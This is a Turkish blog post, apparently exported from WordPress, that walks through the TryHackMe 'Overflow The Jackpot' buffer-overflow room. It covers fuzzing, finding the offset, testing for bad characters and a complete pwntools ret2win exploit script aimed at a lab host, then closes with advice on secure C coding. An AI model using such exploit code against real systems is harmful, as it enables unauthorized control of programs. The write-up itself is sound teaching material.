{"id":43972,"date":"2026-08-10T09:07:01","date_gmt":"2026-08-10T06:07:01","guid":{"rendered":"https:\/\/fatihsoysal.com\/blog\/tryhackme-overflow-the-jackpot-writeup-ve-rehberi\/"},"modified":"2026-08-10T09:07:29","modified_gmt":"2026-08-10T06:07:29","slug":"tryhackme-overflow-the-jackpot-writeup-ve-rehberi","status":"publish","type":"post","link":"https:\/\/fatihsoysal.com\/blog\/tryhackme-overflow-the-jackpot-writeup-ve-rehberi\/","title":{"rendered":"TryHackMe Overflow The Jackpot Writeup ve Rehberi"},"content":{"rendered":"<h2>TryHackMe Overflow The Jackpot Writeup ve Rehberi<\/h2>\n<p>TryHackMe platformunda yer alan Overflow The Jackpot odas\u0131n\u0131n ad\u0131m ad\u0131m \u00e7\u00f6z\u00fcm rehberi ile bellek ta\u015fmas\u0131 (Buffer Overflow) zafiyetlerini derinlemesine ke\u015ffedin ve s\u00f6m\u00fcr\u00fc kodunuzu yaz\u0131n.<\/p>\n<h2>Buffer Overflow Nedir ve Neden Hayati \u00d6neme Sahiptir?<\/h2>\n<p>Siber g\u00fcvenlik d\u00fcnyas\u0131nda ikili dosya s\u00f6m\u00fcr\u00fcs\u00fc (binary exploitation) denildi\u011finde akla gelen ilk zafiyet t\u00fcrlerinden biri bellek ta\u015fmas\u0131d\u0131r (Buffer Overflow). \u00d6zellikle C ve C++ gibi bellek y\u00f6netimini do\u011frudan geli\u015ftiriciye b\u0131rakan alt seviye programlama dillerinde, bellek s\u0131n\u0131rlar\u0131n\u0131n do\u011fru denetlenmemesi bu g\u00fcvenlik a\u00e7\u0131\u011f\u0131na yol a\u00e7ar. Bir program, kullan\u0131c\u0131n\u0131n girdi\u011fi veriyi depolamak i\u00e7in bellekte belirli bir alan (buffer) ay\u0131r\u0131r. Ancak programc\u0131 girilen verinin uzunlu\u011funu kontrol etmezse, tahsis edilen alan\u0131n \u00f6tesine ta\u015fan veriler biti\u015fik bellek h\u00fccrelerini ezmeye ba\u015flar.<\/p>\n<p>Sistem mimarisinde y\u0131\u011f\u0131n (stack) bellek yap\u0131s\u0131, LIFO (Last In, First Out &#8211; Son Giren \u0130lk \u00c7\u0131kar) prensibine g\u00f6re \u00e7al\u0131\u015f\u0131r. Y\u0131\u011f\u0131n \u00fczerinde yerel de\u011fi\u015fkenler, fonksiyon d\u00f6n\u00fc\u015f adresleri ve \u00e7er\u00e7eve i\u015faret\u00e7ileri saklan\u0131r. Bellek ta\u015fmas\u0131 ger\u00e7ekle\u015fti\u011finde, sald\u0131rgan yaln\u0131zca yerel de\u011fi\u015fkenleri bozmakla kalmaz, ayn\u0131 zamanda fonksiyonun \u00e7al\u0131\u015fma bitiminde d\u00f6nece\u011fi adresi (Return Address) kendi belirledi\u011fi bir adrese y\u00f6nlendirebilir. B\u00f6ylece program\u0131n ak\u0131\u015f\u0131 tamamen de\u011fi\u015ftirilir.<\/p>\n<p>A\u015fa\u011f\u0131daki tabloda y\u0131\u011f\u0131n belle\u011fin tipik yap\u0131s\u0131 ve veri ak\u0131\u015f\u0131n\u0131n y\u00f6n\u00fc g\u00f6sterilmektedir:<\/p>\n<table>\n<thead>\n<tr>\n<th>Bellek B\u00f6lgesi<\/th>\n<th>A\u00e7\u0131klama<\/th>\n<th>Yazma Y\u00f6n\u00fc<\/th>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td>Yerel De\u011fi\u015fkenler (Buffer)<\/td>\n<td>Program\u0131n kullan\u0131c\u0131dan ald\u0131\u011f\u0131 veriyi tuttu\u011fu bellek alan\u0131.<\/td>\n<td>A\u015fa\u011f\u0131dan Yukar\u0131ya (D\u00fc\u015f\u00fckten Y\u00fcksek Adrese)<\/td>\n<\/tr>\n<tr>\n<td>EBP \/ RBP (Base Pointer)<\/td>\n<td>\u00d6nceki stack \u00e7er\u00e7evesinin taban adresini saklar.<\/td>\n<td>A\u015fa\u011f\u0131dan Yukar\u0131ya<\/td>\n<\/tr>\n<tr>\n<td>EIP \/ RIP (Return Address)<\/td>\n<td>Fonksiyon bitti\u011finde \u00e7al\u0131\u015ft\u0131r\u0131lacak sonraki komutun adresi.<\/td>\n<td>A\u015fa\u011f\u0131dan Yukar\u0131ya<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p>Bu zafiyet t\u00fcr\u00fcn\u00fcn hayati \u00f6neme sahip olmas\u0131n\u0131n ana sebebi, yetki y\u00fckseltme (privilege escalation) ve uzaktan kod \u00e7al\u0131\u015ft\u0131rma (Remote Code Execution &#8211; RCE) imkan\u0131 tan\u0131mas\u0131d\u0131r. Dolay\u0131s\u0131yla, potansiyel bir sald\u0131rgan program\u0131n yetkileriyle sistemde tam kontrol elde edebilir. Zafiyetin mekanizmas\u0131n\u0131 kavramak i\u00e7in modern zararl\u0131 yaz\u0131l\u0131mlar\u0131n ve exploit tekniklerinin temellerini bilmek gerekir.<\/p>\n<h2>Statik ve Dinamik Analiz: \u0130kili Dosya (Binary) \u0130ncelemesi<\/h2>\n<p>TryHackMe \u00fczerindeki Overflow The Jackpot odas\u0131na ba\u015flad\u0131\u011f\u0131m\u0131zda, \u00f6ncelikle bize verilen ikili dosyay\u0131 (binary) incelememiz gerekir. Analiz s\u00fcreci iki temel a\u015famadan olu\u015fur: Statik analiz ve dinamik analiz. Statik analizde program\u0131 \u00e7al\u0131\u015ft\u0131rmadan kod yap\u0131s\u0131 ve derleme g\u00fcvenlik \u00f6nlemleri incelenirken, dinamik analizde program y\u00fcr\u00fct\u00fclerek bellek davran\u0131\u015f\u0131 g\u00f6zlemlenir.<\/p>\n<p>\u0130lk ad\u0131m olarak hedef dosyan\u0131n t\u00fcr\u00fcn\u00fc ve g\u00fcvenlik mekanizmalar\u0131n\u0131 kontrol etmek i\u00e7in Linux terminalinde <code>file<\/code> ve <code>checksec<\/code> komutlar\u0131n\u0131 \u00e7al\u0131\u015ft\u0131r\u0131r\u0131z. Bu ara\u00e7lar bize dosyan\u0131n mimarisi (32-bit veya 64-bit) ve hangi koruma teknolojilerinin aktif oldu\u011fu hakk\u0131nda kritik bilgiler sunar.<\/p>\n<div class=\"code-container\">\n<pre><code>file jackpot\nchecksec --file=jackpot<\/code><\/pre>\n<\/div>\n<p>Analiz sonucunda elde etti\u011fimiz \u00e7\u0131kt\u0131lar, izleyece\u011fimiz stratejiyi do\u011frudan belirler. \u00d6rne\u011fin <code>checksec<\/code> komutu ile a\u015fa\u011f\u0131daki g\u00fcvenlik mekanizmalar\u0131n\u0131n durumunu de\u011ferlendiririz:<\/p>\n<ul>\n<li><strong>Stack Canary:<\/strong> Y\u0131\u011f\u0131n ta\u015fmalar\u0131n\u0131 alg\u0131lamak i\u00e7in bellek adreslerinin aras\u0131na yerle\u015ftirilen rastgele de\u011ferlerdir. De\u011fer bozulursa program derhal kapat\u0131l\u0131r.<\/li>\n<li><strong>NX (No-Execute) \/ DEP:<\/strong> Y\u0131\u011f\u0131n alan\u0131nda kod \u00e7al\u0131\u015ft\u0131r\u0131lmas\u0131n\u0131 engeller. E\u011fer aktifse, do\u011frudan shellcode \u00e7al\u0131\u015ft\u0131rmak yerine ROP (Return-Oriented Programming) teknikleri kullan\u0131lmal\u0131d\u0131r.<\/li>\n<li><strong>PIE (Position Independent Executable):<\/strong> Program\u0131n bellek adreslerinin her \u00e7al\u0131\u015ft\u0131rmada rastgele de\u011fi\u015fmesini sa\u011flar.<\/li>\n<li><strong>ASLR (Address Space Layout Randomization):<\/strong> \u0130\u015fletim sistemi d\u00fczeyinde k\u00fct\u00fcphanelerin bellek adreslerini rastgele olu\u015fturur.<\/li>\n<\/ul>\n<p>Statik incelemenin ard\u0131ndan disassembler ara\u00e7lar\u0131 (Ghidra, IDA Pro veya Radare2) yard\u0131m\u0131yla uygulaman\u0131n kaynak kod yap\u0131s\u0131n\u0131 tersine m\u00fchendislik (reverse engineering) y\u00f6ntemleriyle inceleriz. Kodu inceledi\u011fimizde, kullan\u0131c\u0131 girdisini alan fonksiyonun <code>gets()<\/code> veya s\u0131n\u0131r\u0131 olmayan bir <code>strcpy()<\/code> fonksiyonu oldu\u011funu tespit ederiz. Ayr\u0131ca program i\u00e7erisinde &#8220;jackpot&#8221; miktar\u0131n\u0131 tutan veya bizi do\u011frudan sistem kabu\u011funa (shell) ula\u015ft\u0131racak gizli bir fonksiyonun varl\u0131\u011f\u0131n\u0131 belirleriz.<\/p>\n<h2>Ta\u015fma Noktas\u0131n\u0131 Tespit Etme: Fuzzing ve Offset Hesab\u0131<\/h2>\n<p>Bellek ta\u015fmas\u0131 s\u00f6m\u00fcr\u00fcs\u00fcnde en kritik a\u015fama, ta\u015fman\u0131n ba\u015flad\u0131\u011f\u0131 nokta ile Komut \u0130\u015faret\u00e7isi (Instruction Pointer &#8211; EIP veya RIP) aras\u0131ndaki mesafeyi, yani &#8220;offset&#8221; de\u011ferini bulmakt\u0131r. Offset de\u011ferini tam olarak hesaplamadan program ak\u0131\u015f\u0131n\u0131 kontrol etmek m\u00fcmk\u00fcn de\u011fildir.<\/p>\n<p>\u00d6ncelikle fuzzing y\u00f6ntemiyle uygulaman\u0131n ka\u00e7 karakterden sonra \u00e7\u00f6kt\u00fc\u011f\u00fcn\u00fc (Segmentation Fault \/ SIGSEGV) g\u00f6zlemleriz. Bunun i\u00e7in Python kullanarak hedef programa giderek artan uzunlukta veriler g\u00f6ndeririz. Uygulama \u00e7\u00f6kt\u00fc\u011f\u00fcnde bellek d\u00f6k\u00fcm\u00fc (core dump) incelenir.<\/p>\n<div class=\"code-container\">\n<pre><code>python3 -c 'print(\"A\" * 50)' | .\/jackpot\npython3 -c 'print(\"A\" * 100)' | .\/jackpot\npython3 -c 'print(\"A\" * 150)' | .\/jackpot<\/code><\/pre>\n<\/div>\n<p>\u00c7\u00f6kme an\u0131 tespit edildikten sonra kesin offset de\u011ferini bulmak amac\u0131yla benzersiz d\u00f6ng\u00fcsel desenler (cyclic patterns) kullan\u0131r\u0131z. Metasploit framework i\u00e7erisinde yer alan <code>msf-pattern_create<\/code> veya Pwntools k\u00fct\u00fcphanesindeki <code>cyclic<\/code> fonksiyonu bu i\u015flem i\u00e7in idealdir. \u00d6rne\u011fin 200 karakterlik benzersiz bir desen \u00fcreterek bunu GDB (GNU Debugger) alt\u0131nda \u00e7al\u0131\u015fan programa girdi olarak veririz.<\/p>\n<div class=\"code-container\">\n<pre><code>msf-pattern_create -l 200<\/code><\/pre>\n<\/div>\n<p>\u00dcretilen metin uygulamaya g\u00f6nderildi\u011finde program \u00e7\u00f6ker ve GDB ekran\u0131nda <code>EIP<\/code> veya <code>RIP<\/code> yazmac\u0131nda (register) kalan de\u011fer okunur. \u00d6rne\u011fin EIP yazmac\u0131ndaki de\u011fer <code>0x37616136<\/code> olarak okunmu\u015fsa, bu hex de\u011ferinin desen i\u00e7erisindeki konumunu belirlemek i\u00e7in <code>msf-pattern_offset<\/code> arac\u0131n\u0131 \u00e7al\u0131\u015ft\u0131r\u0131r\u0131z.<\/p>\n<div class=\"code-container\">\n<pre><code>msf-pattern_offset -q 0x37616136<\/code><\/pre>\n<\/div>\n<p>Yap\u0131lan hesaplama sonucunda offset de\u011ferinin tam olarak 136 byte oldu\u011fu tespit edilir. Bu durum, g\u00f6nderece\u011fimiz ilk 136 byte&#8217;l\u0131k verinin y\u0131\u011f\u0131ndaki tamponu dolduraca\u011f\u0131n\u0131, hemen ard\u0131ndan gelen 4 veya 8 byte&#8217;l\u0131k verinin ise do\u011frudan EIP\/RIP yazmac\u0131n\u0131n \u00fczerine yaz\u0131laca\u011f\u0131n\u0131 g\u00f6sterir.<\/p>\n<h2>Bellek D\u00fczenini Sa\u011flama: K\u00f6t\u00fc Karakterlerin (Bad Chars) Tespiti<\/h2>\n<p>\u0130kili dosya s\u00f6m\u00fcr\u00fcs\u00fcnde haz\u0131rlad\u0131\u011f\u0131m\u0131z zararl\u0131 y\u00fck\u00fcn (payload) bellek taraf\u0131ndan do\u011fru bir \u015fekilde i\u015flenebilmesi i\u00e7in &#8220;k\u00f6t\u00fc karakterler&#8221; (bad characters) olarak adland\u0131r\u0131lan baytlar\u0131n tespit edilip temizlenmesi \u015fartt\u0131r. K\u00f6t\u00fc karakterler, program\u0131n girdi i\u015fleme fonksiyonlar\u0131 taraf\u0131ndan \u00f6zel bir anlam y\u00fcklenen ve verinin kesilmesine veya bozulmas\u0131na neden olan karakterlerdir.<\/p>\n<p>En yayg\u0131n k\u00f6t\u00fc karakter <code>\\x00<\/code> (Null Byte) de\u011feridir. C dilinde karakter dizileri (strings) null byte g\u00f6rd\u00fc\u011f\u00fc anda sonlan\u0131r. Dolay\u0131s\u0131yla payload i\u00e7inde yer alan bir null byte, s\u00f6m\u00fcr\u00fc kodunun geri kalan\u0131n\u0131n belle\u011fe yaz\u0131lmas\u0131n\u0131 engeller. Benzer \u015fekilde <code>\\x0a<\/code> (Line Feed \/ Yeni Sat\u0131r) veya <code>\\x0d<\/code> (Carriage Return) karakterleri de girdi alma fonksiyonlar\u0131n\u0131 sonland\u0131rabilir.<\/p>\n<p>K\u00f6t\u00fc karakterleri tespit etmek i\u00e7in <code>\\x00<\/code> hari\u00e7 <code>\\x01<\/code> ile <code>\\xff<\/code> aras\u0131ndaki t\u00fcm hex de\u011ferleri i\u00e7eren bir bayt dizisi (byte array) olu\u015ftururuz. Bu diziyi offset dolgu verisinin ard\u0131ndan programa g\u00f6ndeririz.<\/p>\n<div class=\"code-container\">\n<pre><code>badchars = (\n    b\"\\x01\\x02\\x03\\x04\\x05\\x06\\x07\\x08\\x09\\x0a\\x0b\\x0c\\x0d\\x0e\\x0f\\x10\"\n    b\"\\x11\\x12\\x13\\x14\\x15\\x16\\x17\\x18\\x19\\x1a\\x1b\\x1c\\x1d\\x1e\\x1f\\x20\"\n    # ... \\xff de\u011ferine kadar devam eder\n)<\/code><\/pre>\n<\/div>\n<p>Program GDB \u00fczerinde \u00e7\u00f6kt\u00fcr\u00fcld\u00fckten sonra bellek adresi <code>x\/256bx $esp<\/code> komutuyla incelenir. Bellekteki bayt s\u0131ras\u0131n\u0131n bozuldu\u011fu veya kesildi\u011fi noktadaki karakter k\u00f6t\u00fc karakter olarak i\u015faretlenir ve test listesinden \u00e7\u0131kar\u0131l\u0131r. Bu i\u015flem, bellek dizilimi ard\u0131\u015f\u0131k ve hatas\u0131z bir \u015fekilde s\u0131ralanana kadar tekrarlan\u0131r.<\/p>\n<h2>S\u0131zma Senaryosu: Exploit Kodunun Ad\u0131m Ad\u0131m Yaz\u0131lmas\u0131<\/h2>\n<p>Offset de\u011ferini hesaplad\u0131ktan ve k\u00f6t\u00fc karakterleri ay\u0131klad\u0131ktan sonra s\u0131ra as\u0131l s\u00f6m\u00fcr\u00fc kodunu (exploit) kaleme almaya gelir. Bu a\u015famada Python dili ve siber g\u00fcvenlik uzmanlar\u0131n\u0131n vazge\u00e7ilmez arac\u0131 olan <code>pwntools<\/code> k\u00fct\u00fcphanesi kullan\u0131l\u0131r. Senaryomuzda hedef, program i\u00e7erisindeki gizli <code>jackpot()<\/code> fonksiyonunun bellek adresine atlamak veya sistem kabu\u011fu almam\u0131z\u0131 sa\u011flayacak shellcode yap\u0131s\u0131n\u0131 \u00e7al\u0131\u015ft\u0131rmakt\u0131r.<\/p>\n<p>GDB veya Ghidra yard\u0131m\u0131yla hedeflenen <code>jackpot_win<\/code> fonksiyonunun bellek adresinin <code>0x080491b6<\/code> oldu\u011funu varsayal\u0131m. X86 mimarisinde veriler bellekte &#8220;Little-Endian&#8221; (k\u00fc\u00e7\u00fck sonlu) format\u0131nda saklan\u0131r. Yani adres de\u011ferini bayt dizisine \u00e7evirirken ters s\u0131rayla paketlememiz gerekir. Pwntools i\u00e7erisindeki <code>p32()<\/code> veya <code>p64()<\/code> fonksiyonlar\u0131 bu d\u00f6n\u00fc\u015ft\u00fcrme i\u015flemini otomatik olarak ger\u00e7ekle\u015ftirir.<\/p>\n<p>A\u015fa\u011f\u0131da TryHackMe Overflow The Jackpot odas\u0131 i\u00e7in geli\u015ftirilmi\u015f eksiksiz Python s\u00f6m\u00fcr\u00fc kodu yer almaktad\u0131r:<\/p>\n<div class=\"code-container\">\n<pre><code>from pwn import *\n\n# Hedef ba\u011flant\u0131 bilgileri veya yerel s\u00fcre\u00e7\nhost = \"10.10.x.x\"\nport = 1337\n\n# Pwntools konfig\u00fcrasyonu\ncontext.update(arch='i386', os='linux')\n\n# Offset de\u011feri ve Hedef Adres\noffset = 136\ntarget_address = 0x080491b6  # jackpot_win fonksiyonunun adresi\n\n# Payload Olu\u015fturma\n# 1. Tampon Alan\u0131n\u0131 Doldurma (Padding)\npadding = b\"A\" * offset\n\n# 2. Return Address \u00dczerine Yaz\u0131lacak Adres\neip = p32(target_address)\n\n# 3. Nihai Payload Birle\u015ftirme\npayload = padding + eip\n\nlog.info(f\"Payload boyutu: {len(payload)} byte\")\nlog.info(\"Hedefe ba\u011flan\u0131l\u0131yor ve payload g\u00f6nderiliyor...\")\n\ntry:\n    # Uzak sunucuya ba\u011flan\n    r = remote(host, port)\n    \n    # Sunucu kar\u015f\u0131lama metnini oku\n    r.recvuntil(b\"Enter ticket number:\")\n    \n    # Haz\u0131rlanan zararl\u0131 y\u00fck\u00fc g\u00f6nder\n    r.sendline(payload)\n    \n    # Etkile\u015fimli kabuk veya bayrak (flag) \u00e7\u0131kt\u0131s\u0131n\u0131 al\n    flag = r.recvall().decode('utf-8', errors='ignore')\n    log.success(f\"Tebrikler! Jackpot Kazan\u0131ld\u0131: {flag}\")\n\nexcept Exception as e:\n    log.error(f\"S\u00f6m\u00fcr\u00fc s\u0131ras\u0131nda hata olu\u015ftu: {e}\")<\/code><\/pre>\n<\/div>\n<p>Bu kod \u00e7al\u0131\u015ft\u0131r\u0131ld\u0131\u011f\u0131nda, g\u00f6nderilen 136 adet &#8220;A&#8221; karakteri tampon belle\u011fi tamamen doldurur. Ard\u0131ndan gelen <code>0x080491b6<\/code> adresi do\u011frudan <code>EIP<\/code> yazmac\u0131n\u0131n \u00fczerine yaz\u0131l\u0131r. Fonksiyon sonland\u0131\u011f\u0131nda i\u015flemci bir sonraki komutu y\u00fcr\u00fctmek i\u00e7in EIP&#8217;deki adrese y\u00f6nlenir ve do\u011frudan <code>jackpot_win<\/code> fonksiyonunu \u00e7al\u0131\u015ft\u0131rarak hedef sistemdeki bayra\u011f\u0131 (flag) ekran\u0131m\u0131za basar.<\/p>\n<h2>Ger\u00e7ek D\u00fcnya Senaryosu: Slot Makineleri ve IoT Cihazlar\u0131nda Bellek G\u00fcvenli\u011fi<\/h2>\n<p>TryHackMe \u00fczerindeki bu sim\u00fclasyon, soyut bir konsept gibi g\u00f6r\u00fcnse de ger\u00e7ek d\u00fcnya senaryolar\u0131nda son derece somut kar\u015f\u0131l\u0131klara sahiptir. \u00d6zellikle kumarhanelerde kullan\u0131lan fiziksel slot makineleri, bilet otomatlar\u0131 ve end\u00fcstriyel IoT cihazlar\u0131 genellikle g\u00f6m\u00fcl\u00fc C\/C++ yaz\u0131l\u0131mlar\u0131yla \u00e7al\u0131\u015f\u0131r.<\/p>\n<p>Nitekim ge\u00e7mi\u015fte yap\u0131lan siber g\u00fcvenlik ara\u015ft\u0131rmalar\u0131nda, baz\u0131 fiziksel slot makinelerinin seri port (RS-232) veya kart okuyucu aray\u00fczlerinde bellek denetimi yap\u0131lmad\u0131\u011f\u0131 ortaya \u00e7\u0131kar\u0131lm\u0131\u015ft\u0131r. Sald\u0131rganlar, \u00f6zel tasarlanm\u0131\u015f donan\u0131m ara\u00e7lar\u0131yla (\u00f6rne\u011fin ak\u0131ll\u0131 kart sim\u00fclat\u00f6rleri) cihaza y\u00fcksek miktarda veri g\u00f6ndererek bellek ta\u015fmas\u0131 tetiklemi\u015ftir. Bellekte bulunan &#8220;kredi miktar\u0131n\u0131&#8221; veya &#8220;kazan\u00e7 durumunu&#8221; tutan de\u011fi\u015fkenlerin \u00fczerine yazarak makineden haks\u0131z ikramiye (jackpot) \u00f6demesi alm\u0131\u015flard\u0131r.<\/p>\n<p>Bu durum, yaz\u0131l\u0131m seviyesindeki bir bellek hatas\u0131n\u0131n do\u011frudan finansal ve fiziksel kay\u0131plara nas\u0131l yol a\u00e7abilece\u011finin net bir kan\u0131t\u0131d\u0131r. Dolay\u0131s\u0131yla, g\u00f6m\u00fcl\u00fc sistem mimarilerinde bellek g\u00fcvenli\u011fi kritik bir katmand\u0131r.<\/p>\n<h2>Zafiyetten Korunma ve G\u00fcvenli Kod Geli\u015ftirme Y\u00f6ntemleri<\/h2>\n<p>Bellek ta\u015fmas\u0131 zafiyetlerini tamamen ortadan kald\u0131rmak i\u00e7in yaz\u0131l\u0131m geli\u015ftirme s\u00fcre\u00e7lerinde g\u00fcvenli kodlama standartlar\u0131n\u0131n uygulanmas\u0131 \u015fartt\u0131r. Tehditleri kayna\u011f\u0131nda engellemek, sistem derlendikten sonra korumaya \u00e7al\u0131\u015fmaktan her zaman daha etkilidir.<\/p>\n<p>Geli\u015ftiricilerin dikkat etmesi gereken temel g\u00fcvenlik \u00f6nlemleri \u015funlard\u0131r:<\/p>\n<ul>\n<li><strong>G\u00fcvensiz Fonksiyonlar\u0131 Terk Etmek:<\/strong> S\u0131n\u0131r kontrol\u00fc yapmayan <code>gets()<\/code>, <code>strcpy()<\/code>, <code>strcat()<\/code> ve <code>sprintf()<\/code> gibi fonksiyonlar yerine, uzunluk s\u0131n\u0131r\u0131 belirten <code>fgets()<\/code>, <code>strncpy()<\/code>, <code>strncat()<\/code> ve <code>snprintf()<\/code> fonksiyonlar\u0131 kullan\u0131lmal\u0131d\u0131r.<\/li>\n<li><strong>Derleyici G\u00fcvenlik \u00d6nlemlerini Aktif Etmek:<\/strong> Derleme a\u015famas\u0131nda Stack Canaries (<code>-fstack-protector-all<\/code>), NX Bit (<code>-z noexecstack<\/code>) ve ASLR gibi mekanizmalar aktif tutulmal\u0131d\u0131r.<\/li>\n<li><strong>Bellek G\u00fcvenlikli Diller Tercih Etmek:<\/strong> Yeni projelerde bellek y\u00f6netimini otomatik ve g\u00fcvenli bir \u015fekilde yapan Rust, Go veya modern C++ (smart pointers ile) dilleri tercih edilmelidir.<\/li>\n<li><strong>Statik Kod Analizi (SAST):<\/strong> Kaynak kodlar derlenmeden \u00f6nce otomatik analiz ara\u00e7lar\u0131yla taranarak potansiyel bellek s\u0131z\u0131nt\u0131lar\u0131 ve g\u00fcvensiz fonksiyon kullan\u0131mlar\u0131 tespit edilmelidir.<\/li>\n<\/ul>\n<p>A\u015fa\u011f\u0131daki tabloda g\u00fcvensiz C fonksiyonlar\u0131 ve bunlar\u0131n yerine kullan\u0131lmas\u0131 gereken g\u00fcvenli alternatifleri listelenmi\u015ftir:<\/p>\n<table>\n<thead>\n<tr>\n<th>G\u00fcvensiz Fonksiyon<\/th>\n<th>Risk Sebebi<\/th>\n<th>G\u00fcvenli Alternatifi<\/th>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td><code>gets(buffer)<\/code><\/td>\n<td>Hi\u00e7bir boyut kontrol\u00fc yapmaz, do\u011frudan ta\u015fmaya sebep olur.<\/td>\n<td><code>fgets(buffer, sizeof(buffer), stdin)<\/code><\/td>\n<\/tr>\n<tr>\n<td><code>strcpy(dest, src)<\/code><\/td>\n<td>Kaynak dizinin hedef alana s\u0131\u011f\u0131p s\u0131\u011fmad\u0131\u011f\u0131n\u0131 denetlemez.<\/td>\n<td><code>strncpy(dest, src, sizeof(dest) - 1)<\/code><\/td>\n<\/tr>\n<tr>\n<td><code>sprintf(buf, fmt, ...)<\/code><\/td>\n<td>Bi\u00e7imlendirilmi\u015f verinin boyutunu hesaba katmaz.<\/td>\n<td><code>snprintf(buf, sizeof(buf), fmt, ...)<\/code><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<h2>S\u0131k\u00e7a Sorulan Sorular (SSS)<\/h2>\n<h3>1. Buffer Overflow zafiyetleri g\u00fcn\u00fcm\u00fczde hala ge\u00e7erli mi?<\/h3>\n<p>Evet, modern i\u015fletim sistemleri ASLR, DEP ve Stack Canary gibi g\u00fc\u00e7l\u00fc koruma mekanizmalar\u0131na sahip olsa da, \u00f6zellikle g\u00f6m\u00fcl\u00fc sistemlerde, IoT cihazlar\u0131nda, s\u00fcr\u00fcc\u00fclerde (drivers) ve eski C\/C++ kod tabanlar\u0131nda bellek ta\u015fmas\u0131 zafiyetleri varl\u0131\u011f\u0131n\u0131 s\u00fcrd\u00fcrmektedir. Sald\u0131rganlar bu korumalar\u0131 bypass etmek i\u00e7in ROP (Return-Oriented Programming) gibi ileri d\u00fczey teknikler kullanmaktad\u0131r.<\/p>\n<h3>2. RIP register&#8217;\u0131 ile EIP register&#8217;\u0131 aras\u0131ndaki fark nedir?<\/h3>\n<p>EIP (Extended Instruction Pointer), 32-bit x86 mimarilerinde bir sonraki y\u00fcr\u00fct\u00fclecek komutun adresini tutan 32 bitlik yazma\u00e7t\u0131r. RIP (Instruction Pointer) ise 64-bit x64 mimarilerinde ayn\u0131 i\u015flevi g\u00f6ren 64 bitlik geni\u015fletilmi\u015f yazma\u00e7t\u0131r.<\/p>\n<h3>3. ASLR korumas\u0131 aktifse Buffer Overflow nas\u0131l bypass edilir?<\/h3>\n<p>ASLR korumas\u0131 aktif oldu\u011funda bellek adresleri her \u00e7al\u0131\u015ft\u0131rmada de\u011fi\u015fir. Bunu bypass etmek i\u00e7in bellek s\u0131z\u0131nt\u0131s\u0131 (information leak) zafiyetlerinden faydalanarak temel bellek adresi (base address) hesaplan\u0131r veya korumaya tabi olmayan sabit mod\u00fcller (Partial ASLR \/ Non-PIE binary b\u00f6l\u00fcmleri) \u00fczerinden atlama yap\u0131l\u0131r.<\/p>\n<h3>4. Pwntools k\u00fct\u00fcphanesini kullanmak neden avantajl\u0131d\u0131r?<\/h3>\n<p>Pwntools, s\u0131zma testi uzmanlar\u0131 ve CTF oyuncular\u0131 i\u00e7in geli\u015ftirilmi\u015f Python tabanl\u0131 bir k\u00fct\u00fcphanedir. Veri paketleme (<code>p32<\/code>\/<code>p64<\/code>), kabuk kod (shellcode) \u00fcretimi, soket ba\u011flant\u0131lar\u0131 y\u00f6netimi ve cyclic desen olu\u015fturma gibi karma\u015f\u0131k i\u015flemleri birka\u00e7 sat\u0131r kod ile h\u0131zl\u0131ca yapmay\u0131 sa\u011flar.<\/p>\n<p>#SiberG\u00fcvenlik #BufferOverflow #TryHackMe #BinaryExploitation #S\u0131zmaTesti<\/p>\n<div class=\"github-example-link\"><strong>\u00d6rnek kod:<\/strong> <a href=\"https:\/\/github.com\/fatihsoysalcom\/buffer-overflow-simple-variable-overwrite\" target=\"_blank\" rel=\"noopener noreferrer\">github.com\/fatihsoysalcom\/buffer-overflow-simple-variable-overwrite<\/a><\/div>\n","protected":false},"excerpt":{"rendered":"TryHackMe platformunda yer alan Overflow The Jackpot odas\u0131n\u0131n ad\u0131m ad\u0131m \u00e7\u00f6z\u00fcm rehberi ile bellek ta\u015fmas\u0131 (Buffer Overflow) zafiyetlerini derinlemesine ke\u015ffedin ve s\u00f6m\u00fcr\u00fc kodunuzu yaz\u0131n.","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"csco_page_header_type":"","csco_page_load_nextpost":"","csco_page_subscribe_form":"","csco_page_contact_form":"","footnotes":""},"categories":[1],"tags":[],"class_list":{"0":"post-43972","1":"post","2":"type-post","3":"status-publish","4":"format-standard","6":"category-genel","7":"cs-entry","8":"cs-video-wrap"},"yoast_head":"<!-- This site is optimized with the Yoast SEO Premium plugin v20.5 (Yoast SEO v25.3.1) - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>TryHackMe Overflow The Jackpot Writeup ve Rehberi - Kodlar\u0131n Gizemli D\u00fcnyas\u0131<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/fatihsoysal.com\/blog\/tryhackme-overflow-the-jackpot-writeup-ve-rehberi\/\" \/>\n<meta property=\"og:locale\" content=\"tr_TR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"TryHackMe Overflow The Jackpot Writeup ve Rehberi\" \/>\n<meta property=\"og:description\" content=\"TryHackMe platformunda yer alan Overflow The Jackpot odas\u0131n\u0131n ad\u0131m ad\u0131m \u00e7\u00f6z\u00fcm rehberi ile bellek ta\u015fmas\u0131 (Buffer Overflow) zafiyetlerini derinlemesine ke\u015ffedin ve s\u00f6m\u00fcr\u00fc kodunuzu yaz\u0131n.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/fatihsoysal.com\/blog\/tryhackme-overflow-the-jackpot-writeup-ve-rehberi\/\" \/>\n<meta property=\"og:site_name\" content=\"Kodlar\u0131n Gizemli D\u00fcnyas\u0131\" \/>\n<meta property=\"article:published_time\" content=\"2026-08-10T06:07:01+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2026-08-10T06:07:29+00:00\" \/>\n<meta name=\"author\" content=\"Fatih Soysal\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Yazan:\" \/>\n\t<meta name=\"twitter:data1\" content=\"Fatih Soysal\" \/>\n\t<meta name=\"twitter:label2\" content=\"Tahmini okuma s\u00fcresi\" \/>\n\t<meta name=\"twitter:data2\" content=\"12 dakika\" \/>\n<script type=\"application\/ld+json\" 